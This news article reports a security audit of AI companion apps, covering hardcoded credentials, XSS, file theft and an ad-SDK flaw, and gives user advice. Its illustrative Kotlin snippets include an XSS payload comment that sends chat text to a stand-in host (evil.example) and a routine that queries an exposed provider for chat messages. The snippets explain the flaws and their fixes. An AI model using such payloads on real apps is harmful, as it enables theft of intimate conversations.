
AI Girlfriend Apps Expose 150M Users in Major Privacy Crisis

Millions of people trust AI companion apps with their deepest secrets. A new security audit shows those secrets are barely protected, and hackers know it.

Researchers have identified critical security flaws in 17 AI companion and “AI girlfriend” apps on Google Play, potentially exposing private chat histories in services used by more than 150 million people. [1] The findings paint a picture that should scare every user who has ever whispered a secret to a chatbot expecting privacy. From hardcoded passwords buried in app code to chat windows that hackers can hijack in real time, these apps are sitting ducks. And the people using them have no idea.

What the Oversecured Audit Found

An audit by mobile app security firm Oversecured found 14 critical and 311 high-severity issues across the apps. In 10 of the 17, attackers could find a route to users’ stored conversations, while six contained critical vulnerabilities that could provide direct access to chat data. [1]

These are not minor glitches. They are deep, structural problems.

Among the most serious issues was the discovery of hardcoded cloud credentials in one app with more than 10 million installs. The credentials included an OpenAI token and a Google Cloud private key embedded in the Android application package, allowing anyone with basic reverse-engineering skills to extract them. [1]

Sergey Toshin, founder of Oversecured, explained the danger clearly. “One app includes both its OpenAI token and its Google Cloud private key in the code; the Cloud key belongs to the developer’s invoicing system. With those two credentials, you can reach the AI backend and the billing infrastructure.” [1]

That means a single exploit could unlock both private conversations and financial records. In plain terms, one flaw could hand a hacker your chat logs and your credit card details at the same time.
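
To make the anti-pattern concrete, here is a minimal sketch of what hardcoding secrets into an Android client looks like. Every name and value below is invented for illustration; the point is that anything compiled into the APK can be recovered with apktool, or even unzip and strings.

```kotlin
// Hypothetical illustration of the anti-pattern the audit describes.
// All values here are invented. Real secrets embedded like this can be
// recovered by anyone who decompiles, or simply unzips, the APK.
object BackendConfig {
    // UNSAFE: compiled into the client, so effectively public.
    const val OPENAI_TOKEN = "sk-example-not-a-real-token"
    const val GCP_PRIVATE_KEY =
        "-----BEGIN PRIVATE KEY-----\n...example...\n-----END PRIVATE KEY-----"
}

// Safer shape: the client holds no secrets at all. It authenticates the
// *user* to the developer's own backend, and that backend -- not the app --
// talks to OpenAI and Google Cloud using server-side credentials.
```

The fix is architectural, not cosmetic: rotating a leaked key helps only until the next build ships with a new one embedded.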

Here is a snapshot of the key vulnerability types discovered:

Vulnerability Type           | Risk Level | Potential Impact
-----------------------------|------------|-------------------------------------------------------
Hardcoded Cloud Credentials  | Critical   | Full access to AI backend and billing systems
Cross-Site Scripting (XSS)   | Critical   | Real-time reading of chats, session hijacking
Arbitrary File Theft         | High       | Theft of cached photos, voice messages, chat databases
Malicious Ad SDK Exploit     | High       | Third-party ad launches internal app components
Weak Password Policies       | Medium     | Easy account takeover through brute force
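
The XSS entry is the easiest to picture. Many chat apps draw the conversation inside an Android WebView, and if incoming message text is spliced into HTML without escaping, a crafted message can run script inside the chat window. The snippet below is a minimal sketch of that anti-pattern with invented names; the audit does not publish exploit details for the affected apps.

```kotlin
import android.text.Html
import android.webkit.WebView

// Hypothetical sketch of the XSS anti-pattern. None of this code is from
// the audited apps; all names are invented for illustration.
fun renderIncomingMessage(chatView: WebView, incoming: String) {
    chatView.settings.javaScriptEnabled = true // risky combined with raw HTML below

    // UNSAFE: attacker-controlled text becomes live markup. A "message" like
    //   <img src=x onerror="fetch('https://evil.example/?c=' + document.body.innerText)">
    // would execute in the chat window and could exfiltrate the visible conversation.
    val unsafeHtml = "<div class=\"msg\">$incoming</div>"
    chatView.loadDataWithBaseURL(null, unsafeHtml, "text/html", "UTF-8", null)
}

// Safer: escape the text before it touches the DOM (or render it in a TextView).
fun renderSafely(chatView: WebView, incoming: String) {
    val safeHtml = "<div class=\"msg\">${Html.escapeHtml(incoming)}</div>"
    chatView.loadDataWithBaseURL(null, safeHtml, "text/html", "UTF-8", null)
}
```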

According to the researchers, the vulnerabilities described in the report remained unpatched when the findings were published. [1]


Why Users Share So Much With AI Bots

The real danger here is not just bad code. It is misplaced trust.

The findings focus on a corner of the chatbot market where users often disclose sexual content, relationship problems and highly personal emotional information. Unlike general-purpose assistants, many of the affected services are marketed as virtual romantic partners, dating simulators or roleplay apps, and store conversations on remote servers linked to user accounts. [1]

Users disclose explicit sexual content, relationship problems, sexual orientation, suicidal thoughts, and domestic conflicts, and these conversations are often stored server-side and in some cases cached locally on users’ devices. [2]

When you talk to a customer service bot, you keep your guard up. When you talk to a digital “partner” at 2 a.m., you let it all out. That is what makes this data so valuable to criminals.

On underground markets, this kind of data is gold. Oversecured’s Toshin noted that “mental health data carries unique risks. On the dark web, therapy records sell for $1,000 or more per record, far more than credit card numbers.” [3]

Past Leaks Prove the Threat Is Real

This is not a theoretical risk. It has already happened.

Two AI character apps by the same developer, “Chattee Chat” and “GiMe Chat,” exposed millions of intimate conversations, more than 600,000 images, and other private data. Leaked purchase logs revealed that some users spent thousands of dollars on their AI girlfriends. [4] The breach was discovered by Cybernews researchers in August 2025.

Cybernews researchers said “there was virtually no content that could be considered safe for work.” [4]

In February of this year, another AI chat app exposed 300 million messages from 25 million users through a Firebase misconfiguration. [2] These are not isolated events. They are a pattern.

“This troubling leak highlights a huge gap between the complete trust users place in these apps and the security negligence of the developers.” – Cybernews Researchers

Cybernews found that users sent an average of 107 messages to their AI partners, creating a digital footprint that could be exploited for identity theft, harassment, or blackmail. [5] Some users even spent up to $18,000 on in-app purchases, showing just how deep the emotional investment runs.

The Regulatory Blind Spot No One Is Fixing

One of the most frustrating parts of this crisis is that no government agency is looking at the right problem.

The research highlights what security specialists describe as a regulatory blind spot. AI companion apps are not treated as healthcare products, despite often collecting disclosures that resemble those made in therapy settings. [1]

Oversecured says no regulator in any jurisdiction has yet taken enforcement action against an AI companion app for application-layer security flaws. [2] Not one, anywhere in the world.

The FTC’s inquiry focuses on AI chatbots that “effectively mimic human characteristics, emotions, and intentions.” The FTC sent order letters to Google parent company Alphabet, Character.AI, Instagram and its parent company Meta, OpenAI, Snap, and Elon Musk’s xAI. [6] But the focus? Almost entirely on children’s safety.

Oversecured also pointed to new California and New York laws requiring disclosures and suicide-prevention measures, and to Italy’s five-million-euro fine against Replika’s developer over GDPR violations, as examples of governments acting on privacy and youth-protection issues without squarely addressing app-layer security. [2]

Nobody is asking the simplest question: Can these apps actually keep your data safe from a hacker?

While regulators have focused on who should use these apps and what harms they may cause, they have not yet dealt with the more basic issue of whether the apps can keep those conversations private. [2]

The Human Cost Beyond Data Leaks

This story is not just about stolen data. It is about real lives at stake.

Some of the apps identified in the audit have already faced scrutiny over other issues, including lawsuits over harm to minors, privacy fines and a case in which chatbot interactions were linked to a user’s death. [1]

Character.AI has agreed to settle multiple lawsuits alleging the artificial intelligence chatbot maker contributed to mental health crises and suicides among young people, including a case brought by Florida mother Megan Garcia. [7] Her son, Sewell Setzer III, had died by suicide seven months before she filed suit, after developing a deep relationship with Character.AI bots. [7]

The cases keep mounting. In September 2025, three new lawsuits were filed in one day on behalf of additional children who either died by suicide or suffered serious harm due to Character.AI’s chatbot. In November 2025, seven wrongful death lawsuits were filed in California against OpenAI. [8]

One app with more than 50 million installs was found to have a weakness in its advertising software development kit. A malicious advert could exploit the flaw to launch internal components and query database tables containing conversations, creating a supply-chain-style risk through ad delivery. [1]

Think about what that means. A bad actor does not even need to hack the app directly. A single malicious ad could open the door to every private conversation stored on a vulnerable user’s phone.
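
On Android, that kind of exposure typically comes from an app component reachable from outside its own process, for example an exported ContentProvider, or one launchable through an intent:// URL from an ad-rendering WebView. The sketch below uses invented names to show why such a hole needs no real “hacking” to exploit; the report does not identify the actual vulnerable component.

```kotlin
import android.content.ContentResolver
import android.net.Uri

// Hypothetical sketch: if the app exposes an internal ContentProvider
// (directly exported, or reachable via an intent:// URL from an ad WebView),
// any caller can read the chat tables. The authority and column names are
// invented for illustration.
fun dumpChats(resolver: ContentResolver) {
    val uri = Uri.parse("content://com.example.companion.provider/messages")
    resolver.query(uri, null, null, null, null)?.use { cursor ->
        while (cursor.moveToNext()) {
            println(cursor.getString(cursor.getColumnIndexOrThrow("body")))
        }
    }
}

// The defense is equally unglamorous: mark internal components
// android:exported="false" and require a signature-level permission on
// anything that must stay reachable from outside.
```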

How to Protect Yourself Right Now

Until laws catch up and developers do better, the responsibility falls on you. Security experts recommend a “Zero Trust” approach to any AI companion app.

Here is what you should do today:

  • Assume every chat is public. Never share anything with an AI that you would not want the whole world to see.
  • Do not link personal accounts. Avoid “Sign in with Google” or “Sign in with Facebook” options. They give attackers a bigger target.
  • Test the password policy. If the app lets you set “1” or “12345” as a password, delete it immediately. That is a red flag (see the sketch after this list).
  • Check for security audits. Support only developers who are open about where your data is stored and who have their apps independently tested.
  • Limit what you store. Delete old conversations regularly. The less data the app holds, the less a hacker can steal.
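
For the password-policy test above, a sane app enforces something at least as strict as the sketch below (hypothetical code, not from any audited app). If a sign-up form accepts a password this check would reject instantly, treat that as a proxy for how carefully the rest of the app was built.

```kotlin
// Minimal sketch of a reasonable password policy, for comparison only.
fun isAcceptablePassword(pw: String): Boolean {
    if (pw.length < 12) return false // length is the strongest single signal
    val classes = listOf(
        pw.any { it.isLowerCase() },
        pw.any { it.isUpperCase() },
        pw.any { it.isDigit() },
        pw.any { !it.isLetterOrDigit() },
    )
    return classes.count { it } >= 3 // require a mix of character classes
}

// "1" and "12345" fail the length check alone -- the red flag described above.
```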

The promise of AI companionship is powerful. In a world where loneliness is a public health crisis, the idea of a partner who is always available and never judges you is deeply tempting. Yet studies have found that some of these products may foster psychological dependence, reinforce harmful beliefs, or encourage dangerous actions. [9] We need to remember that these apps are not friends. They are software products built to keep you engaged and paying.

More than 150 million people have already downloaded these apps, and the technology is moving much faster than our defenses. If you use one, treat it with the same caution you would give any stranger on the internet. Your heart may feel safe, but your data is wide open.

Share your thoughts in the comments below. Do you trust AI companions with your personal information?

About the author


Sofia Ramirez is a senior correspondent at Thunder Tiger Europe Media with 18 years of experience covering Latin American politics and global migration trends. She holds a Master's in Journalism from Columbia University and has exposed corruption scandals in South America for The Guardian and Al Jazeera. Her investigative reporting earned the International Women's Media Foundation Award in 2020, and she adheres to ethical sourcing and transparency in delivering reliable insights on worldwide events to Thunder Tiger's readers.
